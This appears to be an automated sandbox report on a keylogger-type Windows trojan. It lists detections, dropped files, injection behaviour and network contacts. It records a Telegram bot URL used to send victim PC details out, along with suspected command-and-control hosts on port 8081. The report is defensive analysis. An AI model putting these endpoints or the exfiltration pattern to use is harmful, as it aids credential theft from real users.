          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1637274 Sample: NDQ211216GM08.exe.bin.exe Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 4 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Antivirus / Scanner detection for submitted sample 2->48 54 5 other signatures 2->54 8 NDQ211216GM08.exe.bin.exe 36 2->8         started        11 svchost.exe 1 1 2->11         started        signatures3 50 Tries to detect the country of the analysis system (by using the IP) 30->50 52 Uses the Telegram API (likely for C&C communication) 32->52 process4 dnsIp5 24 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->24 dropped 14 powershell.exe 30 8->14         started        42 127.0.0.1 unknown unknown 11->42 file6 process7 file8 26 C:\Users\user\AppData\Local\...26onalined.exe, PE32 14->26 dropped 28 C:\Users\...28onalined.exe:Zone.Identifier, ASCII 14->28 dropped 64 Early bird code injection technique detected 14->64 66 Writes to foreign memory regions 14->66 68 Found suspicious powershell code related to unpacking or dynamic code loading 14->68 70 3 other signatures 14->70 18 Nonalined.exe 15 8 14->18         started        22 conhost.exe 14->22         started        signatures9 process10 dnsIp11 36 api.telegram.org 149.154.167.220, 443, 49713 TELEGRAMRU United Kingdom 18->36 38 checkip.dyndns.com 193.122.130.0, 49695, 49699, 49701 ORACLE-BMC-31898US United States 18->38 40 3 other IPs or domains 18->40 56 Antivirus detection for dropped file 18->56 58 Multi AV Scanner detection for dropped file 18->58 60 Tries to steal Mail credentials (via file / registry access) 18->60 62 3 other signatures 18->62 signatures12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          NDQ211216GM08.exe.bin.exe63%VirustotalBrowse
          NDQ211216GM08.exe.bin.exe63%ReversingLabsWin32.Ransomware.Generic
          NDQ211216GM08.exe.bin.exe100%AviraTR/Injector.wdfal

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\Nonalined.exe100%AviraTR/Injector.wdfal
          C:\Users\user\AppData\Local\Temp\Nonalined.exe63%ReversingLabsWin32.Ransomware.Generic
          C:\Users\user\AppData\Local\Temp\Nonalined.exe63%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dll0%VirustotalBrowse

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          drive.google.com
          		142.250.74.206
          		truefalse
            		high
            drive.usercontent.google.com
            		142.250.186.129
            		truefalse
              		high
              reallyfreegeoip.org
              		104.21.80.1
              		truefalse
                		high
                api.telegram.org
                		149.154.167.220
                		truefalse
                  		high
                  checkip.dyndns.com
                  		193.122.130.0
                  		truefalse
                    		high
                    checkip.dyndns.org
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://reallyfreegeoip.org/xml/8.46.123.189false
                        		high
                        http://checkip.dyndns.org/false
                          		high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2014/03/2025%20/%2011:48:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20aNonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://api.telegram.orgNonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.org/botNonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.ecosia.org/newtab/v20Y&Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/Licensepowershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://chrome.google.com/webstore?hl=enNonalined.exe, 0000000B.00000002.2269171713.00000000203E1000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000203D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://varders.kozow.com:8081Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.google.comNonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.google.com/images/branding/product/ico/googleg_alldp.icoNonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchNonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://aka.ms/pscore6lBjrpowershell.exe, 00000001.00000002.1425106652.00000000049D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://apis.google.comNonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://chrome.google.com/webstore?hl=enlBjrNonalined.exe, 0000000B.00000002.2269171713.00000000203DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1425106652.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://reallyfreegeoip.org/xml/Nonalined.exe, 0000000B.00000002.2269171713.000000002029D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://drive.google.com/9ANonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.office.com/Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://contoso.com/Iconpowershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://crl.ver)svchost.exe, 00000004.00000002.2251563547.0000025204400000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://ac.ecosia.org?q=Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://drive.usercontent.google.com/Nonalined.exe, 0000000B.00000003.1492131065.0000000004183000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527984035.0000000004183000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527968014.0000000004181000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1492077176.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527902003.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.0000000004143000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://checkip.dyndns.orgNonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://chrome.google.com/webstore?hl=en4Nonalined.exe, 0000000B.00000002.2269171713.00000000203E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://nsis.sf.net/NSIS_ErrorErrorNDQ211216GM08.exe.bin.exe, Nonalined.exe.1.drfalse
                                                                                                		high
                                                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.office.com/lBjrNonalined.exe, 0000000B.00000002.2269171713.000000002040D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://aborters.duckdns.org:8081Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://crl.mpowershell.exe, 00000001.00000002.1430200400.000000000714F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.office.com/4Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://g.live.com/odclientsettings/Prod-C:edb.log.4.drfalse
                                                                                                              		high
                                                                                                              http://anotherarmy.dns.army:8081Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://duckduckgo.com/chrome_newtabv20Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 00000004.00000003.1206920172.0000025204600000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drfalse
                                                                                                                      		high
                                                                                                                      https://reallyfreegeoip.org/xml/8.46.123.189$Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002030D000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000202C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://reallyfreegeoip.orgNonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002029D000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002030D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://drive.google.com/qANonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://gemini.google.com/app?q=Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high

                                                                                                                                World Map of Contacted IPs

                                                                                                                                • No. of IPs < 25%
                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                • 75% < No. of IPs

                                                                                                                                Public IPs

                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                142.250.186.129
                                                                                                                                		drive.usercontent.google.comUnited States
                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                149.154.167.220
                                                                                                                                		api.telegram.orgUnited Kingdom
                                                                                                                                		62041TELEGRAMRUfalse
                                                                                                                                142.250.74.206
                                                                                                                                		drive.google.comUnited States
                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                193.122.130.0
                                                                                                                                		checkip.dyndns.comUnited States
                                                                                                                                		31898ORACLE-BMC-31898USfalse
                                                                                                                                104.21.80.1
                                                                                                                                		reallyfreegeoip.orgUnited States
                                                                                                                                		13335CLOUDFLARENETUSfalse

                                                                                                                                Private

                                                                                                                                IP
                                                                                                                                127.0.0.1

                                                                                                                                General Information

                                                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                                                Analysis ID:1637274
                                                                                                                                Start date and time:2025-03-13 13:32:27 +01:00
                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                Overall analysis duration:0h 8m 7s
                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                Report type:full
                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                Number of analysed new started processes analysed:14
                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                Number of existing processes analysed:0
                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                Number of injected processes analysed:0
                                                                                                                                Technologies:
                                                                                                                                • HCA enabled
                                                                                                                                • EGA enabled
                                                                                                                                • AMSI enabled
                                                                                                                                Analysis Mode:default
                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                Sample name:NDQ211216GM08.exe.bin.exe
                                                                                                                                Detection:MAL
                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@7/21@5/6
                                                                                                                                EGA Information:
                                                                                                                                • Successful, ratio: 66.7%
                                                                                                                                HCA Information:
                                                                                                                                • Successful, ratio: 98%
                                                                                                                                • Number of executed functions: 192
                                                                                                                                • Number of non-executed functions: 125
                                                                                                                                Cookbook Comments:
                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                Warnings

                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                • Excluded IPs from analysis (whitelisted): 23.60.203.209, 172.202.163.200
                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 6456 because it is empty
                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                Simulations

                                                                                                                                Behavior and APIs

                                                                                                                                TimeTypeDescription
                                                                                                                                08:33:42API Interceptor40x Sleep call for process: powershell.exe modified
                                                                                                                                08:34:00API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                08:34:37API Interceptor58513x Sleep call for process: Nonalined.exe modified

                                                                                                                                Joe Sandbox View / Context

                                                                                                                                IPs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                149.154.167.2202025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  SOA Since OCT DEC 241738316681530012900.batGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      https://parta-doc.surge.sh/connexion.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                        PO-2513203-PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                            SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                              y79a2l1FY5.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  https://possibles-x.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    193.122.130.02025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    QUOTATION_MARQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    efs.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    y79a2l1FY5.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    mybestgirlfriendwalkingaroundtheworld.htaGet hashmaliciousCobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    Payment_Advise.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    Yeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    MALZEME G_0017 TABANCA SPREY NOZUL.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    file.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    104.21.80.1MG710417.exeGet hashmaliciousAzorultBrowse
                                                                                                                                                    • gd53.cfd/TL341/index.php
                                                                                                                                                    PRI_VTK250419A.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                    • touxzw.ir/scc1/five/fre.php
                                                                                                                                                    DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.rbopisalive.cyou/2dxw/
                                                                                                                                                    Marzec 2025-faktura.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.oldpay.online/u023/?lneDc=2js00DxFGjY6gHlVOW1q9a10L3HzPIs7WpRmaT2A/LnakQk0VzYAjcxSKMUcEwKHsPPKaiHoQA==&NvExnX=FrapFFYPB
                                                                                                                                                    z1companyProfileandproducts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.dd87558.vip/uoki/
                                                                                                                                                    http://7a.ithuupvudv.ruGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 7a.ithuupvudv.ru/favicon.ico
                                                                                                                                                    PRI_VTK250419A.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                    • touxzw.ir/scc1/five/fre.php
                                                                                                                                                    dfiCWCanbj.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                    • touxzw.ir/sccc/five/fre.php
                                                                                                                                                    laser (2).ps1Get hashmaliciousFormBookBrowse
                                                                                                                                                    • www.lucynoel6465.shop/jgkl/
                                                                                                                                                    laser.ps1Get hashmaliciousFormBookBrowse
                                                                                                                                                    • www.tumbetgirislinki.fit/k566/

                                                                                                                                                    Domains

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    checkip.dyndns.com2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    QUOTATION_MARQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    SOA Since OCT DEC 241738316681530012900.batGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 132.226.8.169
                                                                                                                                                    SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 132.226.247.73
                                                                                                                                                    PO-2513203-PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 132.226.247.73
                                                                                                                                                    justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    QUOTATION_FEBQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    efs.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    Product Order Hirsch 1475.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 132.226.247.73
                                                                                                                                                    category05 sc110-11#U3000_Z01G-00008D Siparis PO15804-25 - H64PO1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    reallyfreegeoip.org2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.96.1
                                                                                                                                                    QUOTATION_MARQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                                                                                                                    • 104.21.32.1
                                                                                                                                                    SOA Since OCT DEC 241738316681530012900.batGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.32.1
                                                                                                                                                    SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.112.1
                                                                                                                                                    PO-2513203-PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.112.1
                                                                                                                                                    justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                    • 104.21.112.1
                                                                                                                                                    QUOTATION_FEBQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                                                                                                                    • 104.21.64.1
                                                                                                                                                    efs.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                                                                                    • 104.21.48.1
                                                                                                                                                    Product Order Hirsch 1475.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.64.1
                                                                                                                                                    api.telegram.org2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    SOA Since OCT DEC 241738316681530012900.batGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    https://parta-doc.surge.sh/connexion.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    PO-2513203-PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    y79a2l1FY5.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    https://possibles-x.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 149.154.167.220

                                                                                                                                                    ASNs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    TELEGRAMRUSimpleLoader v2.1.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 149.154.167.99
                                                                                                                                                    2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    SOA Since OCT DEC 241738316681530012900.batGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    https://parta-doc.surge.sh/connexion.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    Launcher.exeGet hashmaliciousLummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                    • 149.154.167.99
                                                                                                                                                    PO-2513203-PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
